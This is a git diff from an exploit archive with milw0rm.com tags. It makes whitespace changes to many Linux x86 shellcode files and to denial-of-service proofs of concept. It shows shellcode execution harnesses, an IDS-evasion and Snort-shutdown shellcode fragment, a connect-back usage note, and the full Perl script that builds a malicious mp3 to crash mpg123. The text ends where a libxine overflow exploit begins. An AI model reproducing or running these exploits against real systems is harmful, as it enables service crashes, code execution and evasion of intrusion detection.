b/platforms/lin_x86/shellcode/13417.c @@ -28,6 +28,6 @@ int main(int argc, char *argv[]) { printf("len:%d\n", strlen(shellcode)); sc(); return 0; -} - +} + // milw0rm.com [2004-12-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13418.c b/platforms/lin_x86/shellcode/13418.c index c029d4dc8..dd2dfba1e 100755 --- a/platforms/lin_x86/shellcode/13418.c +++ b/platforms/lin_x86/shellcode/13418.c @@ -23,6 +23,6 @@ "\x68shDY" /* pushl "shDY" */ "\x68Rha0" /* pushl "Rha0" */ /*--------------------------------------*/ - - + + // milw0rm.com [2004-12-22] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13419.c b/platforms/lin_x86/shellcode/13419.c index 1cfe7c624..a44cb78da 100755 --- a/platforms/lin_x86/shellcode/13419.c +++ b/platforms/lin_x86/shellcode/13419.c @@ -34,6 +34,6 @@ "\x4a" /* dec %edx */ "\x52" /* push %edx */ /*------------------------------------------[bytes:88]-*/ - - + + // milw0rm.com [2004-12-22] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13420.c b/platforms/lin_x86/shellcode/13420.c index af56fd2c4..84c42f94e 100755 --- a/platforms/lin_x86/shellcode/13420.c +++ b/platforms/lin_x86/shellcode/13420.c @@ -33,6 +33,6 @@ "\xa4\x02\x92\x9d" /* */ "\x13\x02\xa3\x9c"; /* */ /*--------------------------------------------[bytes:45]-*/ - - + + // milw0rm.com [2004-12-22] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13421.c b/platforms/lin_x86/shellcode/13421.c index 70b4b20d3..a701d3fa0 100755 --- a/platforms/lin_x86/shellcode/13421.c +++ b/platforms/lin_x86/shellcode/13421.c @@ -42,6 +42,6 @@ /*--string-to-run----------------------------------------*/ "/\x7b\x7b\x7b/\x7b\x7b" /* .string "/bin/sh" */ /*--------------------------------------[length:51bytes]-*/ - - + + // milw0rm.com [2004-12-22] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13422.c b/platforms/lin_x86/shellcode/13422.c index 9bfb30dff..c3d437204 100755 --- a/platforms/lin_x86/shellcode/13422.c +++ b/platforms/lin_x86/shellcode/13422.c @@ -19,6 +19,6 @@ int main(){ void (*run)()=(void *)linux; printf("%d bytes \n",strlen(linux)); run(); -} - +} + // milw0rm.com [2004-11-15] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13423.c b/platforms/lin_x86/shellcode/13423.c index 0b533eafe..82b187506 100755 --- a/platforms/lin_x86/shellcode/13423.c +++ b/platforms/lin_x86/shellcode/13423.c @@ -18,6 +18,6 @@ void code() { "); } void (*ptr)() = (void(*)()) &shellcode[0];(*ptr)(); - - + + // milw0rm.com [2004-11-15] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13424.txt b/platforms/lin_x86/shellcode/13424.txt index 469dfdb6a..93e35e56f 100755 --- a/platforms/lin_x86/shellcode/13424.txt +++ b/platforms/lin_x86/shellcode/13424.txt @@ -22,6 +22,6 @@ char shellc[] = /* RaiSe http://www.netsearch-ezine.com -*/ - +*/ + # milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13425.c b/platforms/lin_x86/shellcode/13425.c index 13ec28dd8..6ec1b86b0 100755 --- a/platforms/lin_x86/shellcode/13425.c +++ b/platforms/lin_x86/shellcode/13425.c @@ -37,6 +37,6 @@ void main() printf("Shellcode length: %d\nExecuting..\n\n", strlen(code)); s(); -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13426.c b/platforms/lin_x86/shellcode/13426.c index c0865e984..52994d869 100755 --- a/platforms/lin_x86/shellcode/13426.c +++ b/platforms/lin_x86/shellcode/13426.c @@ -39,6 +39,6 @@ main (void) code=(void(*)())shellcode; (void)code(); return 0; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13427.c b/platforms/lin_x86/shellcode/13427.c index e370c9a8d..733444ec8 100755 --- a/platforms/lin_x86/shellcode/13427.c +++ b/platforms/lin_x86/shellcode/13427.c @@ -63,6 +63,6 @@ int main(void) ret=(int *)&ret +3; printf("Shellcode lenght=%d\n",strlen(shellcode)); (*ret) = (int)shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13428.c b/platforms/lin_x86/shellcode/13428.c index 872bf577a..04cf4ea12 100755 --- a/platforms/lin_x86/shellcode/13428.c +++ b/platforms/lin_x86/shellcode/13428.c @@ -34,6 +34,6 @@ main() { ret=(int *)&ret+2; printf("Shellcode lenght=%d\n",strlen(shellcode)); (*ret) = (int)shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13429.c b/platforms/lin_x86/shellcode/13429.c index dc9293c8f..30ad039a4 100755 --- a/platforms/lin_x86/shellcode/13429.c +++ b/platforms/lin_x86/shellcode/13429.c @@ -31,6 +31,6 @@ void main() { ret = (int *)&ret +2; printf("Shellcode lenght=%d\n",strlen(shellcode)); (*ret) =(int)shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13430.c b/platforms/lin_x86/shellcode/13430.c index ecd82b74c..eafc95c06 100755 --- a/platforms/lin_x86/shellcode/13430.c +++ b/platforms/lin_x86/shellcode/13430.c @@ -37,6 +37,6 @@ main (void) code=(void(*)())shellcode; (void)code(); return 0; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13431.c b/platforms/lin_x86/shellcode/13431.c index bc0eee2d5..dd8db4db3 100755 --- a/platforms/lin_x86/shellcode/13431.c +++ b/platforms/lin_x86/shellcode/13431.c @@ -29,6 +29,6 @@ int main() { void(* shutdown_snort)() = (void *)snort_shutter_shellcode ; shutdown_snort() ; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13432.c b/platforms/lin_x86/shellcode/13432.c index 828c18914..22716fcee 100755 --- a/platforms/lin_x86/shellcode/13432.c +++ b/platforms/lin_x86/shellcode/13432.c @@ -40,6 +40,6 @@ char shm[] = "\x31\xff\x31\xf6\x31\xd2\xb9\xef\xbe\xad\xde\x31\xdb\xb3\x17\x31" int main() { void (*shell)() = (void *)&shm; shell(); -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13433.c b/platforms/lin_x86/shellcode/13433.c index 54a456169..9e191f7a0 100755 --- a/platforms/lin_x86/shellcode/13433.c +++ b/platforms/lin_x86/shellcode/13433.c @@ -35,6 +35,6 @@ main() { ret=(int *)&ret +2; printf("Shellcode lenght=%d\n",strlen(shellcode)); (*ret) = (int)shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13434.c b/platforms/lin_x86/shellcode/13434.c index 61360eac5..dd7c8eb0f 100755 --- a/platforms/lin_x86/shellcode/13434.c +++ b/platforms/lin_x86/shellcode/13434.c @@ -45,6 +45,6 @@ int main() int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13435.c b/platforms/lin_x86/shellcode/13435.c index b65bd46f2..d952366b4 100755 --- a/platforms/lin_x86/shellcode/13435.c +++ b/platforms/lin_x86/shellcode/13435.c @@ -48,6 +48,6 @@ void main(){ * you should modify your ip addr to use it... * to use it, nc -l -p 5 , on another terminal nc -l -p 6 * then run the shellcode with your ip addr or just 127.000.000.001 -*/ - +*/ + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13436.c b/platforms/lin_x86/shellcode/13436.c index a012d0b8a..f47d537d9 100755 --- a/platforms/lin_x86/shellcode/13436.c +++ b/platforms/lin_x86/shellcode/13436.c @@ -85,6 +85,6 @@ main() funct = (int (*)()) code; printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code)); (int)(*funct)(); -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13437.c b/platforms/lin_x86/shellcode/13437.c index a394174f4..0a80f5222 100755 --- a/platforms/lin_x86/shellcode/13437.c +++ b/platforms/lin_x86/shellcode/13437.c @@ -40,6 +40,6 @@ main() { ret=(int *)&ret+2; printf("Shellcode lenght=%d\n",strlen(shellcode)); (*ret) = (int)shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13438.c b/platforms/lin_x86/shellcode/13438.c index dafdcec5f..b91177dc1 100755 --- a/platforms/lin_x86/shellcode/13438.c +++ b/platforms/lin_x86/shellcode/13438.c @@ -75,6 +75,6 @@ __asm__(" /* RaiSe http://www.undersec.com -*/ - +*/ + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13439.c b/platforms/lin_x86/shellcode/13439.c index e5634d1d8..df11dd07a 100755 --- a/platforms/lin_x86/shellcode/13439.c +++ b/platforms/lin_x86/shellcode/13439.c @@ -51,6 +51,6 @@ main() { ret=(int *)&ret +2; printf("Shellcode lenght=%d\n",strlen(eject)); (*ret) = (int)eject; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13440.c b/platforms/lin_x86/shellcode/13440.c index 503af16a1..a7050e526 100755 --- a/platforms/lin_x86/shellcode/13440.c +++ b/platforms/lin_x86/shellcode/13440.c @@ -69,6 +69,6 @@ call -0x54 /* RaiSe http://www.undersec.com -*/ - +*/ + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13441.c b/platforms/lin_x86/shellcode/13441.c index c0f0b595b..39ec23efb 100755 --- a/platforms/lin_x86/shellcode/13441.c +++ b/platforms/lin_x86/shellcode/13441.c @@ -64,6 +64,6 @@ int main(void) /* Sp4rK * UNDERSEC Security TEAM * NetSearch E-zine - */ - + */ + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13442.c b/platforms/lin_x86/shellcode/13442.c index a54242647..133ae00a7 100755 --- a/platforms/lin_x86/shellcode/13442.c +++ b/platforms/lin_x86/shellcode/13442.c @@ -46,6 +46,6 @@ main() { ret=(int *)&ret +2; printf("Shellcode lenght=%d\n",strlen(shellcode)); (*ret) = (int)shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13443.c b/platforms/lin_x86/shellcode/13443.c index b62a9f0b9..0a78d229e 100755 --- a/platforms/lin_x86/shellcode/13443.c +++ b/platforms/lin_x86/shellcode/13443.c @@ -32,6 +32,6 @@ main() ret=(int *)&ret +2; printf("Shellcode lenght=%d\n",strlen(shellcode)); (*ret) = (int)shellcode; -} - +} + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13444.c b/platforms/lin_x86/shellcode/13444.c index aca9efc64..43b886842 100755 --- a/platforms/lin_x86/shellcode/13444.c +++ b/platforms/lin_x86/shellcode/13444.c @@ -25,6 +25,6 @@ main() { ret=(int *)&ret+2; printf("Shellcode lenght=%d\n",strlen(shellcode)); (*ret) = (int)shellcode; -} - +} + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13445.c b/platforms/lin_x86/shellcode/13445.c index 574fa5d01..08dfe16d2 100755 --- a/platforms/lin_x86/shellcode/13445.c +++ b/platforms/lin_x86/shellcode/13445.c @@ -32,6 +32,6 @@ main() { ret=(int *)&ret +2; printf("Shellcode lenght=%d\n",strlen(shellcode)); (*ret) = (int)shellcode; -} - +} + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13446.c b/platforms/lin_x86/shellcode/13446.c index 2fa82844f..216fb4773 100755 --- a/platforms/lin_x86/shellcode/13446.c +++ b/platforms/lin_x86/shellcode/13446.c @@ -36,6 +36,6 @@ __asm__ (" movb $0xb, %al # and makeuof here int $0x80 "); -} - +} + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13447.c b/platforms/lin_x86/shellcode/13447.c index ec05831a3..2210cf6b0 100755 --- a/platforms/lin_x86/shellcode/13447.c +++ b/platforms/lin_x86/shellcode/13447.c @@ -45,6 +45,6 @@ main() { ret=(int *)&ret +2; printf("Shellcode lenght=%d\n",strlen(c0de)); (*ret) = (int)c0de; -} - +} + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13448.c b/platforms/lin_x86/shellcode/13448.c index 6a0c8b547..6da8f3b3f 100755 --- a/platforms/lin_x86/shellcode/13448.c +++ b/platforms/lin_x86/shellcode/13448.c @@ -63,6 +63,6 @@ main() { ret=(int *)&ret +2; printf("Shellcode lenght=%d\n",strlen(shellcode)); (*ret) = (int)shellcode; -} - +} + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13449.c b/platforms/lin_x86/shellcode/13449.c index 191b1ae7c..c21917743 100755 --- a/platforms/lin_x86/shellcode/13449.c +++ b/platforms/lin_x86/shellcode/13449.c @@ -134,6 +134,6 @@ void main () { ret=(int *)&ret +2; printf("Shellcode lenght=%d\n",strlen(shellcode)); (*ret) = (int)shellcode; -} - +} + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13450.c b/platforms/lin_x86/shellcode/13450.c index 2023825a6..cbeb44bad 100755 --- a/platforms/lin_x86/shellcode/13450.c +++ b/platforms/lin_x86/shellcode/13450.c @@ -48,6 +48,6 @@ main() { ret=(int *)&ret+2; printf("Shellcode lenght=%d\n",strlen(shellcode)); (*ret) = (int)shellcode; -} - +} + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13451.c b/platforms/lin_x86/shellcode/13451.c index bc3eb5cef..ce9602fa5 100755 --- a/platforms/lin_x86/shellcode/13451.c +++ b/platforms/lin_x86/shellcode/13451.c @@ -22,6 +22,6 @@ void main() printf("w00w00!\n"); ret = (int *)&ret + 2; (*ret) = (int)shellcode; -} - +} + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13452.c b/platforms/lin_x86/shellcode/13452.c index ae6783be3..52d8e4c31 100755 --- a/platforms/lin_x86/shellcode/13452.c +++ b/platforms/lin_x86/shellcode/13452.c @@ -42,6 +42,6 @@ main(void) int *ret; ret = (int*)&ret + 2; (*ret) = shellcode; -} - +} + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13453.c b/platforms/lin_x86/shellcode/13453.c index c3ee492b6..da1cdb848 100755 --- a/platforms/lin_x86/shellcode/13453.c +++ b/platforms/lin_x86/shellcode/13453.c @@ -49,6 +49,6 @@ main(void) int *ret; ret = (int*)&ret + 2; (*ret) = shellcode; -} - +} + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13454.c b/platforms/lin_x86/shellcode/13454.c index c01554e44..8a5d9dc65 100755 --- a/platforms/lin_x86/shellcode/13454.c +++ b/platforms/lin_x86/shellcode/13454.c @@ -69,6 +69,6 @@ int main(){ * chroot(".."); * * execve(sh[0],sh,NULL); * *} * -***********************************************/ - +***********************************************/ + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13455.c b/platforms/lin_x86/shellcode/13455.c index 8d4f789af..82d258301 100755 --- a/platforms/lin_x86/shellcode/13455.c +++ b/platforms/lin_x86/shellcode/13455.c @@ -43,6 +43,6 @@ void main() { } // ANTI-IDS SHELLCODE // -// !!!!!!!!!!!!!!!!!! // - +// !!!!!!!!!!!!!!!!!! // + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13456.c b/platforms/lin_x86/shellcode/13456.c index 32c11d5b4..7fa19edf9 100755 --- a/platforms/lin_x86/shellcode/13456.c +++ b/platforms/lin_x86/shellcode/13456.c @@ -41,6 +41,6 @@ main() funct = (int (*)()) code; printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code)); (int)(*funct)(); -} - +} + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13457.c b/platforms/lin_x86/shellcode/13457.c index 3493c6df2..b267c9023 100755 --- a/platforms/lin_x86/shellcode/13457.c +++ b/platforms/lin_x86/shellcode/13457.c @@ -35,6 +35,6 @@ main() { ret=(int *)&ret +2; printf("Shellcode lenght=%d\n",strlen(c0de)); (*ret) = (int)c0de; -} - +} + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13458.c b/platforms/lin_x86/shellcode/13458.c index f50b6e3cd..aa6447842 100755 --- a/platforms/lin_x86/shellcode/13458.c +++ b/platforms/lin_x86/shellcode/13458.c @@ -52,6 +52,6 @@ main() funct = (int (*)()) code; (int)(*funct)(); } - - + + // milw0rm.com [2001-05-07] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13459.c b/platforms/lin_x86/shellcode/13459.c index 52088a9bd..06e4af18b 100755 --- a/platforms/lin_x86/shellcode/13459.c +++ b/platforms/lin_x86/shellcode/13459.c @@ -70,6 +70,6 @@ int main(){ * execve(sh[0],sh,NULL); * *} * ***********************************************/ - - + + // milw0rm.com [2001-01-13] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13460.c b/platforms/lin_x86/shellcode/13460.c index d74ef30be..f928bd3be 100755 --- a/platforms/lin_x86/shellcode/13460.c +++ b/platforms/lin_x86/shellcode/13460.c @@ -40,6 +40,6 @@ main() { ret=(int *)&ret +2; printf("Shellcode lenght=%d\n",strlen(c0de)); (*ret) = (int)c0de; -} - +} + // milw0rm.com [2000-08-08] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13461.c b/platforms/lin_x86/shellcode/13461.c index ff84adefb..023ac6914 100755 --- a/platforms/lin_x86/shellcode/13461.c +++ b/platforms/lin_x86/shellcode/13461.c @@ -41,6 +41,6 @@ main() { ret=(int *)&ret +2; printf("Shellcode lenght=%d\n",strlen(c0de)); (*ret) = (int)c0de; -} - +} + // milw0rm.com [2000-08-07] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13462.c b/platforms/lin_x86/shellcode/13462.c index ad6f229b8..c026c42a4 100755 --- a/platforms/lin_x86/shellcode/13462.c +++ b/platforms/lin_x86/shellcode/13462.c @@ -75,6 +75,6 @@ main() { ret=(int *)&ret +2; printf("Shellcode lenght=%d\n",strlen(c0de)); (*ret) = (int)c0de; -} - +} + // milw0rm.com [2000-08-07] \ No newline at end of file diff --git a/platforms/linux/dos/1196.c b/platforms/linux/dos/1196.c index 9a0b0ef2f..88f7fa2e0 100755 --- a/platforms/linux/dos/1196.c +++ b/platforms/linux/dos/1196.c @@ -58,6 +58,6 @@ int main(int argc, char **argv) { close(sock); return puts("(done)\n# The server should be frozen now with 100\% cpu usage."); -} - -// milw0rm.com [2005-09-05] +} + +// milw0rm.com [2005-09-05] diff --git a/platforms/linux/dos/1634.pl b/platforms/linux/dos/1634.pl index 38a0b6237..864508ee9 100755 --- a/platforms/linux/dos/1634.pl +++ b/platforms/linux/dos/1634.pl @@ -1,94 +1,94 @@ -#!/usr/bin/perl -# -# Affected product: mpg123-0.59r - http://mpg123.de -# -# I'm not sure what kind of vulnerability is it, but the program -# receives a SIGSEGV when I play it. My gdb skillz r p00r, but -# anybody with more experience than me can find the *real* bug. -# -# $./mpg1DoS3 0 | mpg123 - -# (- switch tells mpg123 to play from stdin) -# $./mpg1DoS3 1 evil.mp3 -# $mpg123 ./evil.mp3 -# -# Regards. -# Nitrous -# Vulnfact Security Group - http://www.vulnfact.com - -my $evilsong = -"\xff\xf2\xc5\x53\xff\xff\xa1\xe2\x41\x41\xad\x9b\xfb\x3f". -"\xdc\xe0\x38\x4c\x7f\xff\x6f\xe7\x0c\x0f\xc3\x3f\x7f\xef". -"\x9a\xa8\x3e\x00\xaa\xe6\x82\xc3\xe8\x65\x7f\xf1\x39\x25". -"\x24\xec\x43\xe6\x12\x44\xb9\xd5\x7a\x2a\x26\xce\xff\xeb". -"\xea\xc7\x2c\xde\x9b\xee\xba\x5a\xe7\x0b\x9d\x14\xef\xe7". -"\x6b\xf5\xa2\xb0\x5c\x4b\x23\xff\xff\xe4\xc2\x53\xff\xff". -"\xad\x21\x27\x0d\x84\xd2\x7d\x1e\xad\x5e\x96\x62\x54\x32". -"\x85\x89\x24\x93\xed\xf3\xac\xd4\x94\xea\x58\x54\xca\x29". -"\x1d\x7d\x7e\xd3\x34\x7e\xb4\x44\x24\x6a\x25\xde\xff\xed". -"\x57\x9d\x2e\x94\xcb\xe3\xd5\x48\x96\x74\x5b\xf7\xd6\x74". -"\x84\xfc\x9a\xc0\x79\x75\x7a\x1e\x31\x1f\x9f\x9f\x11\x94". -"\xd1\x2c\x48\xfe\x5d\x58\xd1\x9f\x2b\x25\x2a\xff\xff\xd0". -"\x15\x48\x1f\xff\xfe\x83\x21\xcf\xff\xff\x52\x61\x18\x6a". -"\xdf\xff\xfa\x90\x11\x01\x59\x37\xfd\x13\xf5\x3c\x7e\x58". -"\x71\xe8\x67\xd1\x0e\xcd\xee\x80\xb4\x35\x2a\x4b\x4f\xff". -"\xf8\xb0\x03\x82\x1c\xf3\x87\x5f\x6e\xf9\x9a\xdc\x5e\x49". -"\x51\xc6\xe0\x15\x04\xca\x49\x14\x0d\x90\x25\x0a\x54\x04". -"\x3c\xc0\x57\x3c\x8a\x7a\x56\x1c\x42\xf2\x47\x47\xb0\x1c". -"\x67\xff\xff\xac\xc1\x17\xff\xff\xea\x19\x89\x63\x4f\xff". -"\xf5\x2e\x91\x04\x59\x93\x93\xff\xf7\xd5\xb9\x28\x46\x20". -"\x9e\xd5\xef\xad\x6d\xb6\x98\x6c\x96\xac\xf3\xd6\x8e\xdc". -"\xc1\x5a\x1a\x8d\x02\x67\x1e\xc3\xc9\xfe\xbf\xfe\x89\xc1". -"\xf4\x79\x98\x4e\x33\x8b\xc8\x00\x41\x54\x94\x8c\x06\xc2". -"\x69\x58\x8a\x04\xc1\x76\x2f\x67\x6c\x09\x0e\xff\xfb\x92". -"\x60\xb9\x00\x02\x6d\x67\x56\xe1\xe7\x3b\x68\x63\x2c\xea". -"\xdd\x60\xed\x6d\x0a\x65\x9d\x5d\x87\xb5\x4d\xa1\x71\x2f". -"\xab\x74\xf5\x35\xb4\xd4\xce\xb6\x76\x7f\x73\x44\x16\xb5". -"\x35\x01\x59\xbf\xff\xfa\x01\xa4\xd7\xff\xff\xe7\x96\x7f". -"\xff\xfe\xa5\x89\x85\xbf\xff\xff\x3c\x7c\x21\x1f\xff\x7f". -"\xf3\x4f\x63\x3f\x6e\x3f\x9a\x9b\x9a\x54\x1d\x02\x52\x32". -"\xec\x7e\xad\xd3\xfd\x09\x82\xd8\x82\x38\xb8\xa0\xde\xf6". -"\xd3\xde\x23\xa0\x0a\x51\xb8\xc0\x61\xc6\xe5\x20\x02\x48". -"\x51\x9c\xa7\x94\xd7\xda\xfc\x4e\x7a\xea\x0b\x19\x84\xd6". -"\xca\x8d\x01\xbb\x5f\xab\xff\xf2\xa1\xe6\x7f\xff\xff\xa8". -"\xc8\x4b\x0b\x1b\xff\xf7\x5a\xa8\x0c\x18\x54\x44\x45\xbf". -"\xff\xe8\x06\x81\x81\x37\x45\x5f\xf4\x3d\xf8\x37\x0d\x12". -"\x47\xff\x32\x6f\xcc\x87\xa2\x49"; - -sub usage -{ - print "###################################################\n"; - print "#### mpg123 DoS Proof of Concept ####\n"; - print "###### nitrousconthacktocommx ######\n"; - print "###################################################\n\n"; - print "Usage: $0 [evil.mp3]\n"; - print "\tmodes: [0 (stdout) | 1 (file)]\n"; - exit; -} - -if(@ARGV < 1){ - usage; -} - -if($ARGV[0] == 0){ - print $evilsong; -} -elsif($ARGV[0] == 1){ - if(!$ARGV[1]){ - print "Filename required !\n\n"; - usage; - } - - open(EV1L, ">$ARGV[1]") or die "Cannot create \"$ARGV[1]\"\n"; - - print EV1L $evilsong; - - close(EV1L); - - print "Ready !\nNow just type \$mpg123 $ARGV[1]\n"; -} -else{ - print "Invalid Mode !\n\n"; - usage; -} - -# milw0rm.com [2006-04-02] +#!/usr/bin/perl +# +# Affected product: mpg123-0.59r - http://mpg123.de +# +# I'm not sure what kind of vulnerability is it, but the program +# receives a SIGSEGV when I play it. My gdb skillz r p00r, but +# anybody with more experience than me can find the *real* bug. +# +# $./mpg1DoS3 0 | mpg123 - +# (- switch tells mpg123 to play from stdin) +# $./mpg1DoS3 1 evil.mp3 +# $mpg123 ./evil.mp3 +# +# Regards. +# Nitrous +# Vulnfact Security Group - http://www.vulnfact.com + +my $evilsong = +"\xff\xf2\xc5\x53\xff\xff\xa1\xe2\x41\x41\xad\x9b\xfb\x3f". +"\xdc\xe0\x38\x4c\x7f\xff\x6f\xe7\x0c\x0f\xc3\x3f\x7f\xef". +"\x9a\xa8\x3e\x00\xaa\xe6\x82\xc3\xe8\x65\x7f\xf1\x39\x25". +"\x24\xec\x43\xe6\x12\x44\xb9\xd5\x7a\x2a\x26\xce\xff\xeb". +"\xea\xc7\x2c\xde\x9b\xee\xba\x5a\xe7\x0b\x9d\x14\xef\xe7". +"\x6b\xf5\xa2\xb0\x5c\x4b\x23\xff\xff\xe4\xc2\x53\xff\xff". +"\xad\x21\x27\x0d\x84\xd2\x7d\x1e\xad\x5e\x96\x62\x54\x32". +"\x85\x89\x24\x93\xed\xf3\xac\xd4\x94\xea\x58\x54\xca\x29". +"\x1d\x7d\x7e\xd3\x34\x7e\xb4\x44\x24\x6a\x25\xde\xff\xed". +"\x57\x9d\x2e\x94\xcb\xe3\xd5\x48\x96\x74\x5b\xf7\xd6\x74". +"\x84\xfc\x9a\xc0\x79\x75\x7a\x1e\x31\x1f\x9f\x9f\x11\x94". +"\xd1\x2c\x48\xfe\x5d\x58\xd1\x9f\x2b\x25\x2a\xff\xff\xd0". +"\x15\x48\x1f\xff\xfe\x83\x21\xcf\xff\xff\x52\x61\x18\x6a". +"\xdf\xff\xfa\x90\x11\x01\x59\x37\xfd\x13\xf5\x3c\x7e\x58". +"\x71\xe8\x67\xd1\x0e\xcd\xee\x80\xb4\x35\x2a\x4b\x4f\xff". +"\xf8\xb0\x03\x82\x1c\xf3\x87\x5f\x6e\xf9\x9a\xdc\x5e\x49". +"\x51\xc6\xe0\x15\x04\xca\x49\x14\x0d\x90\x25\x0a\x54\x04". +"\x3c\xc0\x57\x3c\x8a\x7a\x56\x1c\x42\xf2\x47\x47\xb0\x1c". +"\x67\xff\xff\xac\xc1\x17\xff\xff\xea\x19\x89\x63\x4f\xff". +"\xf5\x2e\x91\x04\x59\x93\x93\xff\xf7\xd5\xb9\x28\x46\x20". +"\x9e\xd5\xef\xad\x6d\xb6\x98\x6c\x96\xac\xf3\xd6\x8e\xdc". +"\xc1\x5a\x1a\x8d\x02\x67\x1e\xc3\xc9\xfe\xbf\xfe\x89\xc1". +"\xf4\x79\x98\x4e\x33\x8b\xc8\x00\x41\x54\x94\x8c\x06\xc2". +"\x69\x58\x8a\x04\xc1\x76\x2f\x67\x6c\x09\x0e\xff\xfb\x92". +"\x60\xb9\x00\x02\x6d\x67\x56\xe1\xe7\x3b\x68\x63\x2c\xea". +"\xdd\x60\xed\x6d\x0a\x65\x9d\x5d\x87\xb5\x4d\xa1\x71\x2f". +"\xab\x74\xf5\x35\xb4\xd4\xce\xb6\x76\x7f\x73\x44\x16\xb5". +"\x35\x01\x59\xbf\xff\xfa\x01\xa4\xd7\xff\xff\xe7\x96\x7f". +"\xff\xfe\xa5\x89\x85\xbf\xff\xff\x3c\x7c\x21\x1f\xff\x7f". +"\xf3\x4f\x63\x3f\x6e\x3f\x9a\x9b\x9a\x54\x1d\x02\x52\x32". +"\xec\x7e\xad\xd3\xfd\x09\x82\xd8\x82\x38\xb8\xa0\xde\xf6". +"\xd3\xde\x23\xa0\x0a\x51\xb8\xc0\x61\xc6\xe5\x20\x02\x48". +"\x51\x9c\xa7\x94\xd7\xda\xfc\x4e\x7a\xea\x0b\x19\x84\xd6". +"\xca\x8d\x01\xbb\x5f\xab\xff\xf2\xa1\xe6\x7f\xff\xff\xa8". +"\xc8\x4b\x0b\x1b\xff\xf7\x5a\xa8\x0c\x18\x54\x44\x45\xbf". +"\xff\xe8\x06\x81\x81\x37\x45\x5f\xf4\x3d\xf8\x37\x0d\x12". +"\x47\xff\x32\x6f\xcc\x87\xa2\x49"; + +sub usage +{ + print "###################################################\n"; + print "#### mpg123 DoS Proof of Concept ####\n"; + print "###### nitrousconthacktocommx ######\n"; + print "###################################################\n\n"; + print "Usage: $0 [evil.mp3]\n"; + print "\tmodes: [0 (stdout) | 1 (file)]\n"; + exit; +} + +if(@ARGV < 1){ + usage; +} + +if($ARGV[0] == 0){ + print $evilsong; +} +elsif($ARGV[0] == 1){ + if(!$ARGV[1]){ + print "Filename required !\n\n"; + usage; + } + + open(EV1L, ">$ARGV[1]") or die "Cannot create \"$ARGV[1]\"\n"; + + print EV1L $evilsong; + + close(EV1L); + + print "Ready !\nNow just type \$mpg123 $ARGV[1]\n"; +} +else{ + print "Invalid Mode !\n\n"; + usage; +} + +# milw0rm.com [2006-04-02] diff --git a/platforms/linux/dos/1641.pl b/platforms/linux/dos/1641.pl index 9ed5d2b7e..071efda6e 100755 --- a/platforms/linux/dos/1641.pl +++ b/platforms/linux/dos/1641.pl @@ -1,384 +1,384 @@ -#!/usr/bin/perl -##################################################################### -# Libxine <= 1.14 : MPEG Stream Buffer overflow 